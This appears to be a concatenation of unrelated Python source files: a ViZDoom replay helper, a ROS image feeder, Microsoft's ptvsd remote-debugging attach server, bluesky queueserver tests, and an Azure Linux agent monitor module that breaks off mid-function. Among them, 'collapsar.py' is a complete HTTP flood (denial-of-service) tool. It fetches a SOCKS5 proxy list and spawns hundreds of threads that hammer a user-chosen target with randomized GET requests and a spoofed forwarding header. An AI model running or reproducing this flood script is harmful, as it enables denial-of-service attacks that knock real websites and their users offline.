if doom.show_automap and state.automap_buffer is not None:
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
cv2.imshow('ViZDoom Automap Buffer', map_)
if time_wait > 0:
cv2.waitKey(int(time_wait) * 1000)
else:
if time_wait > 0:
time.sleep(time_wait)
last_render_time = time.time()
if doom.show_automap:
cv2.destroyAllWindows()
log.debug('Press ESC to exit...')
listener_thread.join()
# noinspection PyProtectedMember
@staticmethod
def replay(env, rec_path):
doom = env.unwrapped
doom.mode = 'replay'
doom._ensure_initialized()
doom.game.replay_episode(rec_path)
episode_reward = 0
start = time.time()
while not doom.game.is_episode_finished():
doom.game.advance_action()
r = doom.game.get_last_reward()
episode_reward += r
log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
log.info('Finishing replay')
doom.close()
|
image_feeder.py
|
#!/usr/bin/env python
import os
import sys
import glob
import rospy
import re
import json
import cv2
import threading
import numpy as np
from cv_bridge import CvBridge
from sensor_msgs import msg as smsg
from geometry_msgs import msg as gmsg
from aist_depth_filter import DepthFilterClient
from tf import TransformBroadcaster, transformations as tfs
#########################################################################
# gloabal functions #
#########################################################################
def transform_from_plane(plane):
def normalize(v):
return v / np.linalg.norm(v)
t = gmsg.TransformStamped()
t.header.frame_id = plane.header.frame_id
t.child_frame_id = "tray_center"
# Compute translation
k = np.array([plane.plane.normal.x, plane.plane.normal.y, plane.plane.normal.z])
x = -plane.plane.distance * k
t.transform.translation.x = x[0]
t.transform.translation.y = x[1]
t.transform.translation.z = x[2]
# Compute rotation
j = normalize(np.cross(k, np.array([1, 0, 0])))
i = np.cross(j, k)
q = tfs.quaternion_from_matrix(
np.array(
[
[i[0], j[0], k[0], 0.0],
[i[1], j[1], k[1], 0.0],
[i[2], j[2], k[2], 0.0],
[0.0, 0.0, 0.0, 1.0],
]
)
)
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
return t
#########################################################################
# class ImageFeeder #
#########################################################################
class ImageFeeder(object):
"""
Supplies images from the annotation database to the recognition pipeline.
Used for testing the pipeline without using a camera or robot.
"""
def __init__(self, data_dir):
super(ImageFeeder, self).__init__()
self._data_dir = data_dir
# Load camera intrinsics
filename = rospy.get_param("~intrinsic", "realsense_intrinsic.json")
with open(self._data_dir + "/" + filename) as f:
try:
intrinsic = json.loads(f.read())
except Exception as e:
rospy.logerr("(Feeder) %s", str(e))
Kt = intrinsic["intrinsic_matrix"]
K = [Kt[0], Kt[3], Kt[6], Kt[1], Kt[4], Kt[7], Kt[2], Kt[5], Kt[8]]
self._cinfo = smsg.CameraInfo()
self._cinfo.header.frame_id = rospy.get_param("~camera_frame", "map")
self._cinfo.height = intrinsic["height"]
self._cinfo.width = intrinsic["width"]
self._cinfo.distortion_model = "plumb_bob"
self._cinfo.D = [0, 0, 0, 0, 0]
self._cinfo.K = K
self._cinfo.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
self._cinfo.P = K[0:3] + [0] + K[3:6] + [0] + K[6:9] + [0]
self._cinfo.binning_x = 0
self._cinfo.binning_y = 0
self._cinfo_pub = rospy.Publisher("~camera_info", smsg.CameraInfo, queue_size=1)
self._image_pub = rospy.Publisher("~image", smsg.Image, queue_size=1)
self._depth_pub = rospy.Publisher("~depth", smsg.Image, queue_size=1)
self._dfilter = DepthFilterClient("depth_filter")
self._broadcaster = TransformBroadcaster()
self._transform = None
self._image = None
self._depth = None
self._run = True
thread = threading.Thread(target=self._stream_image)
thread.start()
def stream_image(self, aanotation_filename):
try:
f = open(annotation_filename)
annotation = json.loads(f.read())
image = cv2.imread(
self._data_dir + "/Annotations/" + annotation["img_path"],
cv2.IMREAD_COLOR,
)
depth = cv2.imread(
self._data_dir + "/Annotations/" + annotation["depth_path"],
cv2.IMREAD_UNCHANGED,
)
self._image = CvBridge().cv2_to_imgmsg(image, encoding="bgr8")
self._depth = CvBridge().cv2_to_imgmsg(depth)
self._transform = None
except Exception as e:
rospy.logerr("(Feeder) %s(annotation = %s)", str(e), annotation_filename)
def quit(self):
self._run = False
def _stream_image(self):
rate = rospy.Rate(10) # 10Hz
while self._run:
if self._image and self._depth:
if self._transform is None:
self._dfilter.detect_plane_send_goal()
now = rospy.Time.now()
self._cinfo.header.stamp = now
self._image.header = self._cinfo.header
self._depth.header = self._cinfo.header
self._cinfo_pub.publish(self._cinfo)
self._image_pub.publish(self._image)
self._depth_pub.publish(self._depth)
if self._transform is None:
plane = self._dfilter.detect_plane_wait_for_result()
if plane is not None:
self._transform = transform_from_plane(plane)
if self._transform is not None:
self._transform.header.stamp = now
self._broadcaster.sendTransformMessage(self._transform)
rate.sleep()
#########################################################################
# main #
#########################################################################
if __name__ == "__main__":
rospy.init_node("~")
data_dir = os.path.expanduser(rospy.get_param("~data_dir", "~/data/WRS_Dataset"))
feeder = ImageFeeder(data_dir)
while not rospy.is_shutdown():
datasets = ("Far", "Close")
for dataset in datasets:
annotation_filenames = glob.glob(
data_dir + "/Annotations/" + dataset + "/Image-wise/*.json"
)
for annotation_filename in annotation_filenames:
rospy.loginfo("*** (Feeder) ==================")
rospy.loginfo("*** (Feeder) annotation: %s", annotation_filename)
feeder.stream_image(annotation_filename)
if raw_input("Hit return key >> ") == "q":
feeder.quit()
sys.exit()
|
attach_server.py
|
# ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# vspython@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
__all__ = ['enable_attach', 'wait_for_attach', 'break_into_debugger', 'settrace', 'is_attached', 'AttachAlreadyEnabledError']
import atexit
import getpass
import os
import os.path
import platform
import socket
import struct
import sys
import threading
try:
import thread
except ImportError:
import _thread as thread
try:
import ssl
except ImportError:
ssl = None
import ptvsd.visualstudio_py_debugger as vspd
import ptvsd.visualstudio_py_repl as vspr
from ptvsd.visualstudio_py_util import to_bytes, read_bytes, read_int, read_string, write_bytes, write_int, write_string
# The server (i.e. the Python app) waits on a TCP port provided. Whenever anything connects to that port,
# it immediately sends the octet sequence 'PTVSDBG', followed by version number represented as int64,
# and then waits for the client to respond with the same exact byte sequence. After signatures are thereby
# exchanged and found to match, the client is expected to provide a string secret (in the usual debugger
# string format, None/ACII/Unicode prefix + length + data), which can be an empty string to designate the
# lack of a specified secret.
#
# If the secret does not match the one expected by the server, it responds with 'RJCT', and then closes
# the connection. Otherwise, the server responds with 'ACPT', and awaits a 4-octet command. The following
# commands are recognized:
#
# 'INFO'
# Report information about the process. The server responds with the following information, in order:
# - Process ID (int64)
# - Executable name (string)
# - User name (string)
# - Implementation name (string)
# and then immediately closes connection. Note, all string fields can be empty or null strings.
#
# 'ATCH'
# Attach debugger to the process. If successful, the server responds with 'ACPT', followed by process ID
# (int64), and then the Python language version that the server is running represented by three int64s -
# major, minor, micro; From there on the socket is assumed to be using the normal PTVS debugging protocol.
# If attaching was not successful (which can happen if some other debugger is already attached), the server
# responds with 'RJCT' and closes the connection.
#
# 'REPL'
# Attach REPL to the process. If successful, the server responds with 'ACPT', and from there on the socket
# is assumed to be using the normal PTVS REPL protocol. If not successful (which can happen if there is
# no debugger attached), the server responds with 'RJCT' and closes the connection.
PTVS_VER = '2.2'
DEFAULT_PORT = 5678
PTVSDBG_VER = 6 # must be kept in sync with DebuggerProtocolVersion in PythonRemoteProcess.cs
PTVSDBG = to_bytes('PTVSDBG')
ACPT = to_bytes('ACPT')
RJCT = to_bytes('RJCT')
INFO = to_bytes('INFO')
ATCH = to_bytes('ATCH')
REPL = to_bytes('REPL')
_attach_enabled = False
_attached = threading.Event()
vspd.DONT_DEBUG.append(os.path.normcase(__file__))
class AttachAlreadyEnabledError(Exception):
"""`ptvsd.enable_attach` has already been called in this process."""
def enable_attach(secret, address = ('0.0.0.0', DEFAULT_PORT), certfile = None, keyfile = None, redirect_output = True):
"""Enables Python Tools for Visual Studio to attach to this process remotely
to debug Python code.
Parameters
----------
secret : str
Used to validate the clients - only those clients providing the valid
secret will be allowed to connect to this server. On client side, the
secret is prepended to the Qualifier string, separated from the
hostname by ``'@'``, e.g.: ``'secret@myhost.cloudapp.net:5678'``. If
secret is ``None``, there's no validation, and any client can connect
freely.
address : (str, int), optional
Specifies the interface and port on which the debugging server should
listen for TCP connections. It is in the same format as used for
regular sockets of the `socket.AF_INET` family, i.e. a tuple of
``(hostname, port)``. On client side, the server is identified by the
Qualifier string in the usual ``'hostname:port'`` format, e.g.:
``'myhost.cloudapp.net:5678'``. Default is ``('0.0.0.0', 5678)``.
certfile : str, optional
Used to enable SSL. If not specified, or if set to ``None``, the
connection between this program and the debugger will be unsecure,
and can be intercepted on the wire. If specified, the meaning of this
parameter is the same as for `ssl.wrap_socket`.
keyfile : str, optional
Used together with `certfile` when SSL is enabled. Its meaning is the
same as for ``ssl.wrap_socket``.
redirect_output : bool, optional
Specifies whether any output (on both `stdout` and `stderr`) produced
by this program should be sent to the debugger. Default is ``True``.
Notes
-----
This function returns immediately after setting up the debugging server,
and does not block program execution. If you need to block until debugger
is attached, call `ptvsd.wait_for_attach`. The debugger can be detached
and re-attached multiple times after `enable_attach` is called.
This function can only be called once during the lifetime of the process.
On a second call, `AttachAlreadyEnabledError` is raised. In circumstances
where the caller does not control how many times the function will be
called (e.g. when a script with a single call is run more than once by
a hosting app or framework), the call should be wrapped in ``try..except``.
Only the thread on which this function is called, and any threads that are
created after it returns, will be visible in the debugger once it is
attached. Any threads that are already running before this function is
called will not be visible.
"""
if not ssl and (certfile or keyfile):
raise ValueError('could not import the ssl module - SSL is not supported on this version of Python')
if sys.platform == 'cli':
# Check that IronPython was launched with -X:Frames and -X:Tracing, since we can't register our trace
# func on the thread that calls enable_attach otherwise
import clr
x_tracing = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Tracing
x_frames = clr.GetCurrentRuntime().GetLanguageByExtension('py').Options.Frames
if not x_tracing or not x_frames:
raise RuntimeError('IronPython must be started with -X:Tracing and -X:Frames options to support PTVS remote debugging.')
global _attach_enabled
if _attach_enabled:
raise AttachAlreadyEnabledError('ptvsd.enable_attach() has already been called in this process.')
_attach_enabled = True
atexit.register(vspd.detach_process_and_notify_debugger)
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(address)
server.listen(1)
def server_thread_func():
while True:
client = None
raw_client = None
try:
client, addr = server.accept()
if certfile:
client = ssl.wrap_socket(client, server_side = True, ssl_version = ssl.PROTOCOL_TLSv1, certfile = certfile, keyfile = keyfile)
write_bytes(client, PTVSDBG)
write_int(client, PTVSDBG_VER)
response = read_bytes(client, 7)
if response != PTVSDBG:
continue
dbg_ver = read_int(client)
if dbg_ver != PTVSDBG_VER:
continue
client_secret = read_string(client)
if secret is None or secret == client_secret:
write_bytes(client, ACPT)
else:
write_bytes(client, RJCT)
continue
response = read_bytes(client, 4)
if response == INFO:
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
exe = sys.executable or ''
write_string(client, exe)
try:
username = getpass.getuser()
except AttributeError:
username = ''
write_string(client, username)
try:
impl = platform.python_implementation()
except AttributeError:
try:
impl = sys.implementation.name
except AttributeError:
impl = 'Python'
major, minor, micro, release_level, serial = sys.version_info
os_and_arch = platform.system()
if os_and_arch == "":
os_and_arch = sys.platform
try:
if sys.maxsize > 2**32:
os_and_arch += ' 64-bit'
else:
os_and_arch += ' 32-bit'
except AttributeError:
pass
version = '%s %s.%s.%s (%s)' % (impl, major, minor, micro, os_and_arch)
write_string(client, version)
# Don't just drop the connection - let the debugger close it after it finishes reading.
client.recv(1)
elif response == ATCH:
debug_options = vspd.parse_debug_options(read_string(client))
if redirect_output:
debug_options.add('RedirectOutput')
if vspd.DETACHED:
write_bytes(client, ACPT)
try:
pid = os.getpid()
except AttributeError:
pid = 0
write_int(client, pid)
major, minor, micro, release_level, serial = sys.version_info
write_int(client, major)
write_int(client, minor)
write_int(client, micro)
vspd.attach_process_from_socket(client, debug_options, report = True)
vspd.mark_all_threads_for_break(vspd.STEPPING_ATTACH_BREAK)
_attached.set()
client = None
else:
write_bytes(client, RJCT)
elif response == REPL:
if not vspd.DETACHED:
write_bytes(client, ACPT)
vspd.connect_repl_using_socket(client)
client = None
else:
write_bytes(client, RJCT)
except (socket.error, OSError):
pass
finally:
if client is not None:
client.close()
server_thread = threading.Thread(target = server_thread_func)
server_thread.setDaemon(True)
server_thread.start()
frames = []
f = sys._getframe()
while True:
f = f.f_back
if f is None:
break
frames.append(f)
frames.reverse()
cur_thread = vspd.new_thread()
for f in frames:
cur_thread.push_frame(f)
def replace_trace_func():
for f in frames:
f.f_trace = cur_thread.trace_func
replace_trace_func()
sys.settrace(cur_thread.trace_func)
vspd.intercept_threads(for_attach = True)
# Alias for convenience of users of pydevd
settrace = enable_attach
def wait_for_attach(timeout = None):
"""If a PTVS remote debugger is attached, returns immediately. Otherwise,
blocks until a remote debugger attaches to this process, or until the
optional timeout occurs.
Parameters
----------
timeout : float, optional
The timeout for the operation in seconds (or fractions thereof).
"""
if vspd.DETACHED:
_attached.clear()
_attached.wait(timeout)
def break_into_debugger():
"""If a PTVS remote debugger is attached, pauses execution of all threads,
and breaks into the debugger with current thread as active.
"""
if not vspd.DETACHED:
vspd.SEND_BREAK_COMPLETE = thread.get_ident()
vspd.mark_all_threads_for_break()
def is_attached():
"""Returns ``True`` if debugger is attached, ``False`` otherwise."""
return not vspd.DETACHED
|
test_manager_options.py
|
import pytest
import shutil
import os
import glob
import subprocess
import time as ttime
import multiprocessing
from bluesky.callbacks.zmq import RemoteDispatcher
from bluesky_queueserver.manager.profile_ops import gen_list_of_plans_and_devices
from bluesky_queueserver.manager.comms import zmq_single_request
from ._common import (
copy_default_profile_collection,
append_code_to_last_startup_file,
wait_for_condition,
condition_environment_created,
condition_queue_processing_finished,
condition_environment_closed,
)
from ._common import re_manager_cmd # noqa: F401
# User name and user group name used throughout most of the tests.
_user, _user_group = "Testing Script", "admin"
_plan1 = {"name": "count", "args": [["det1", "det2"]], "item_type": "plan"}
_sample_plan1 = """
def simple_sample_plan():
'''
Simple plan for tests.
'''
yield from count([det1, det2])
"""
# fmt: off
@pytest.mark.parametrize("option", ["startup_dir", "profile", "multiple"])
# fmt: on
def test_manager_options_startup_profile(re_manager_cmd, tmp_path, monkeypatch, option): # noqa: F811
pc_path = copy_default_profile_collection(tmp_path)
# Add extra plan. The original set of startup files will not contain this plan.
append_code_to_last_startup_file(pc_path, additional_code=_sample_plan1)
# Generate the new list of allowed plans and devices and reload them
gen_list_of_plans_and_devices(startup_dir=pc_path, file_dir=pc_path, overwrite=True)
# Start manager
if option == "startup_dir":
re_manager_cmd(["--startup-dir", pc_path])
elif option == "profile":
# This option is more complicated: we want to recreate the structure of IPython startup
# directory: <some root dir>/profile_<profile_name>/startup.
root_dir = os.path.split(pc_path)[0]
monkeypatch.setenv("IPYTHONDIR", root_dir)
profile_name = "testing"
startup_path = os.path.join(root_dir, f"profile_{profile_name}", "startup")
os.makedirs(startup_path)
file_pattern = os.path.join(pc_path, "*")
for fl_path in glob.glob(file_pattern):
shutil.move(fl_path, startup_path)
os.rmdir(pc_path)
# We pass only profile name as a parameter.
re_manager_cmd(["--startup-profile", profile_name])
elif option == "multiple":
# Expected to fail if multiple options are selected.
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--startup-dir", pc_path, "--startup-profile", "some_name"])
return
else:
assert False, f"Unknown option '{option}'"
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
plan = {"name": "simple_sample_plan", "item_type": "plan"}
params = {"item": plan, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
monkeypatch.setenv("IPYTHONDIR", "abc")
@pytest.fixture
def zmq_proxy():
cmd = ["bluesky-0MQ-proxy", "5567", "5568"]
p = subprocess.Popen(cmd, universal_newlines=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
yield
p.kill()
@pytest.fixture
def zmq_dispatcher():
# The following code was mostly borrowed from 'bluesky.tests.test_zmq.py' (test_zmq_no_RE)
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print("putting ", name, "in queue")
queue.put((name, doc))
d = RemoteDispatcher("127.0.0.1:5568")
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher, daemon=True, args=(queue,))
dispatcher_proc.start()
ttime.sleep(2) # As above, give this plenty of time to start.
yield queue
dispatcher_proc.terminate()
dispatcher_proc.join()
def test_manager_acq_with_0MQ_proxy(re_manager_cmd, zmq_proxy, zmq_dispatcher): # noqa: F811
re_manager_cmd(["--zmq-data-proxy-addr", "localhost:5567"])
# Open the environment (make sure that the environment loads)
resp1, _ = zmq_single_request("environment_open")
assert resp1["success"] is True
assert wait_for_condition(time=10, condition=condition_environment_created)
# Add the plan to the queue (will fail if incorrect environment is loaded)
params = {"item": _plan1, "user": _user, "user_group": _user_group}
resp2, _ = zmq_single_request("queue_item_add", params)
assert resp2["success"] is True, f"resp={resp2}"
# Start the queue
resp3, _ = zmq_single_request("queue_start")
assert resp3["success"] is True
assert wait_for_condition(time=10, condition=condition_queue_processing_finished)
# Make sure that the plan was executed
resp4, _ = zmq_single_request("status")
assert resp4["items_in_queue"] == 0
assert resp4["items_in_history"] == 1
# Close the environment
resp5, _ = zmq_single_request("environment_close")
assert resp5["success"] is True, f"resp={resp5}"
assert wait_for_condition(time=5, condition=condition_environment_closed)
# Test if the data was delivered to the consumer.
# Simple test: check if 'start' and 'stop' documents were delivered.
queue = zmq_dispatcher
remote_accumulator = []
while not queue.empty(): # Since queue is used by one process at a time, queue.empty() should work reliably
remote_accumulator.append(queue.get(timeout=2))
assert len(remote_accumulator) >= 2
assert remote_accumulator[0][0] == "start" # Start document
assert remote_accumulator[-1][0] == "stop" # Stop document
# fmt: off
@pytest.mark.parametrize("redis_addr, success", [
("localhost", True),
("localhost:6379", True),
("localhost:6378", False)]) # Incorrect port.
# fmt: on
def test_manager_redis_addr_parameter(re_manager_cmd, redis_addr, success): # noqa: F811
if success:
re_manager_cmd(["--redis-addr", redis_addr])
# Try to communicate with the server to make sure Redis is configure correctly.
# RE Manager has to access Redis in order to prepare 'status'.
resp1, _ = zmq_single_request("status")
assert resp1["items_in_queue"] == 0
assert resp1["items_in_history"] == 0
else:
with pytest.raises(TimeoutError, match="RE Manager failed to start"):
re_manager_cmd(["--redis-addr", redis_addr])
|
collapsar.py
|
import socks
import socket
import requests
import threading
import random
import ssl
import time
from colorama import Fore
print(Fore.RED + """
____ ______ ____ _____ ________ ___ __ __
/ __ \__ __/ ____/____/ __ \____ / ___/____ /_ __/ /_/ | _____/ //_/
/ /_/ / / / / / / ___/ / / / __ \\__ \/ __ `// / / __/ /| |/ ___/ , <
/ ____/ /_/ / /___/ /__/ /_/ / /_/ /__/ / /_/ // / / /_/ ___ / /__/ /| |
/_/ \__, /\____/\___/_____/\____/____/\__,_//_/ \__/_/ |_\___/_/ |_|
/____/""")
print(Fore.WHITE + "Code By GogoZin -2019/8/21")
print("Version 1.2 ")
def opth(): #Open Threads
for _ in range(thr):
x = threading.Thread(target=atk).start()
print('Threads ' + str(g+1) + " Created ")
def clone(): #Get Socks5 List
r = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all&anonymity=all') #Code By GogoZin
with open('socks5.txt','wb') as f:
f.write(r.content)
print('Sucess Get List !')
def main(): #Setup
global url
global port
global thr
global lsts
global per
global uu
url = str(input('Target (Ex. www.google.com ) : '))
if url =='':
input("Error Input ! Try Again")
return main()
port = str(input('Port (Default Is 80) : '))
if port =='':
port = int(80)
thr = str(input("Threads (1-800 Default Is 300) : "))
if thr =='':
thr = int(300)
else:
thr = int(thr)
per = str(input("CC-Power (1-100 Default Is 70) : "))
if per =='':
per = int(70)
else:
per = int(per)
uu = str(input("Path (Default Is / ) : "))
if uu=='':
uu ='/'
gt = str(input('Get List? (y/n) : '))
if gt =='y':
clone()
else:
pass
lst = str(input('Socks5 List (socks5.txt) : '))
if lst =='':
lst = 'socks5.txt'
lsts = open(lst).readlines()
print('Total Socks5 -> %d'%len(lsts))
time.sleep(2)
opth()
def atk(): #Socks Sent Requests
ua = random.choice(useragent)
proxy = random.choice(lsts).strip().split(":")
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]))
while 1:
try:
s = socks.socksocket()
s.connect((str(url), int(port)))
try:
for _ in range(per):
s.send(str.encode("GET "+uu+"?="+str(random.randint(1,210000000))+" HTTP/1.1\r\nHost: "+url+"\r\nConnection: Keep-Alive\r\nX-Forwarded-For: 1.1.1.1\r\n\r\n"))
s.send(str.encode("GET "+uu+"?="+str(random.randint(1,210000000))+" HTTP/1.1\r\nHost: "+url+"\r\nConnection: Keep-Alive\r\nX-Forwarded-For: 1.1.1.1\r\n\r\n"))
print(Fore.CYAN + "ChallengeCollapsar From ~[" + Fore.WHITE + str(proxy[0])+":"+str(proxy[1])+ Fore.CYAN + "]") #Code By GogoZin
except:
s.close()
except:
s.close()
if __name__=='__main__':
main() #Code By GogoZin
|
monitor.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import time
import uuid
import azurelinuxagent.common.logger as logger
import azurelinuxagent.common.utils.networkutil as networkutil
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.errorstate import ErrorState
from azurelinuxagent.common.event import add_event, WALAEventOperation, report_metric, collect_events
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.osutil import get_osutil
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.protocol.healthservice import HealthService
from azurelinuxagent.common.protocol.imds import get_imds_client
from azurelinuxagent.common.utils.restutil import IOErrorCounter
from azurelinuxagent.common.utils.textutil import hash_strings
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
def generate_extension_metrics_telemetry_dictionary(schema_version=1.0,
performance_metrics=None):
if schema_version == 1.0:
telemetry_dict = {"SchemaVersion": 1.0}
if performance_metrics:
telemetry_dict["PerfMetrics"] = performance_metrics
return telemetry_dict
else:
return None
def get_monitor_handler():
return MonitorHandler()
class MonitorHandler(object):
EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
TELEMETRY_HEARTBEAT_PERIOD = datetime.timedelta(minutes=30)
# extension metrics period
CGROUP_TELEMETRY_POLLING_PERIOD = datetime.timedelta(minutes=5)
CGROUP_TELEMETRY_REPORTING_PERIOD = datetime.timedelta(minutes=30)
# host plugin
HOST_PLUGIN_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
HOST_PLUGIN_HEALTH_PERIOD = datetime.timedelta(minutes=5)
# imds
IMDS_HEARTBEAT_PERIOD = datetime.timedelta(minutes=1)
IMDS_HEALTH_PERIOD = datetime.timedelta(minutes=3)
# Resetting loggers period
RESET_LOGGERS_PERIOD = datetime.timedelta(hours=12)
def __init__(self):
self.osutil = get_osutil()
self.imds_client = None
self.event_thread = None
self.last_reset_loggers_time = None
self.last_event_collection = None
self.last_telemetry_heartbeat = None
self.last_cgroup_polling_telemetry = None
self.last_cgroup_report_telemetry = None
self.last_host_plugin_heartbeat = None
self.last_imds_heartbeat = None
self.protocol = None
self.protocol_util = None
self.health_service = None
self.last_route_table_hash = b''
self.last_nic_state = {}
self.should_run = True
self.heartbeat_id = str(uuid.uuid4()).upper()
self.host_plugin_errorstate = ErrorState(min_timedelta=MonitorHandler.HOST_PLUGIN_HEALTH_PERIOD)
self.imds_errorstate = ErrorState(min_timedelta=MonitorHandler.IMDS_HEALTH_PERIOD)
def run(self):
self.start(init_data=True)
def stop(self):
self.should_run = False
if self.is_alive():
self.event_thread.join()
def init_protocols(self):
# The initialization of ProtocolUtil for the Monitor thread should be done within the thread itself rather
# than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
# thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
self.protocol_util = get_protocol_util()
self.protocol = self.protocol_util.get_protocol()
self.health_service = HealthService(self.protocol.get_endpoint())
def init_imds_client(self):
wireserver_endpoint = self.protocol_util.get_wireserver_endpoint()
self.imds_client = get_imds_client(wireserver_endpoint)
def is_alive(self):
return self.event_thread is not None and self.event_thread.is_alive()
def start(self, init_data=False):
self.event_thread = threading.Thread(target=self.daemon, args=(init_data,))
self.event_thread.setDaemon(True)
self.event_thread.setName("MonitorHandler")
self.event_thread.start()
def collect_and_send_events(self):
"""
Periodically send any events located in the events folder
"""
try:
if self.last_event_collection is None:
self.last_event_collection = datetime.datetime.utcnow() - MonitorHandler.EVENT_COLLECTION_PERIOD
if datetime.datetime.utcnow() >= (self.last_event_collection + MonitorHandler.EVENT_COLLECTION_PERIOD):
try:
event_list = collect_events()
if len(event_list.events) > 0:
self.protocol.report_event(event_list)
except Exception as e:
logger.warn("{0}", ustr(e))
except Exception as e:
logger.warn("Failed to send events: {0}", ustr(e))
self.last_event_collection = datetime.datetime.utcnow()
def daemon(self, init_data=False):
if init_data:
self.init_protocols()
self.init_imds_client()
min_delta = min(MonitorHandler.TELEMETRY_HEARTBEAT_PERIOD,
MonitorHandler.CGROUP_TELEMETRY_POLLING_PERIOD,
MonitorHandler.CGROUP_TELEMETRY_REPORTING_PERIOD,
MonitorHandler.EVENT_COLLECTION_PERIOD,
MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD,
MonitorHandler.IMDS_HEARTBEAT_PERIOD).seconds
while self.should_run:
try:
self.protocol.update_host_plugin_from_goal_state()
self.send_telemetry_heartbeat()
self.poll_telemetry_metrics()
# This will be removed in favor of poll_telemetry_metrics() and it'll directly send the perf data for
# each cgroup.
self.send_telemetry_metrics()
self.collect_and_send_events()
self.send_host_plugin_heartbeat()
self.send_imds_heartbeat()
self.log_altered_network_configuration()
self.reset_loggers()
except Exception as e:
logger.warn("An error occurred in the monitor thread main loop; will skip the current iteration.\n{0}", ustr(e))
time.sleep(min_delta)
def reset_loggers(self):
"""
The loggers maintain hash-tables in memory and they need to be cleaned up from time to time.
For reference, please check azurelinuxagent.common.logger.Logger and
azurelinuxagent.common.event.EventLogger classes
"""
try:
time_now = datetime.datetime.utcnow()
if not self.last_reset_loggers_time:
self.last_reset_loggers_time = time_now
if time_now >= (self.last_reset_loggers_time + MonitorHandler.RESET_LOGGERS_PERIOD):
logger.reset_periodic()
except Exception as e:
logger.warn("Failed to clear periodic loggers: {0}", ustr(e))
self.last_reset_loggers_time = time_now
def send_imds_heartbeat(self):
"""
Send a health signal every IMDS_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have
successfully called and validated a response in the last IMDS_HEALTH_PERIOD.
"""
try:
if self.last_imds_heartbeat is None:
self.last_imds_heartbeat = datetime.datetime.utcnow() - MonitorHandler.IMDS_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (self.last_imds_heartbeat + MonitorHandler.IMDS_HEARTBEAT_PERIOD):
is_currently_healthy, response = self.imds_client.validate()
if is_currently_healthy:
self.imds_errorstate.reset()
else:
self.imds_errorstate.incr()
is_healthy = self.imds_errorstate.is_triggered() is False
logger.verbose("IMDS health: {0} [{1}]", is_healthy, response)
self.health_service.report_imds_status(is_healthy, response)
except Exception as e:
msg = "Exception sending imds heartbeat: {0}".format(ustr(e))
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.ImdsHeartbeat,
is_success=False,
message=msg,
log_event=False)
self.last_imds_heartbeat = datetime.datetime.utcnow()
def send_host_plugin_heartbeat(self):
"""
Send a health signal every HOST_PLUGIN_HEARTBEAT_PERIOD. The signal is 'Healthy' when we have been able to
communicate with HostGAPlugin at least once in the last HOST_PLUGIN_HEALTH_PERIOD.
"""
try:
if self.last_host_plugin_heartbeat is None:
self.last_host_plugin_heartbeat = datetime.datetime.utcnow() - MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD
if datetime.datetime.utcnow() >= (
self.last_host_plugin_heartbeat + MonitorHandler.HOST_PLUGIN_HEARTBEAT_PERIOD):
host_plugin = self.protocol.client.get_host_plugin()
host_plugin.ensure_initialized()
is_currently_healthy = host_plugin.get_health()
if is_currently_healthy:
self.host_plugin_errorstate.reset()
else:
self.host_plugin_errorstate.incr()
is_healthy = self.host_plugin_errorstate.is_triggered() is False
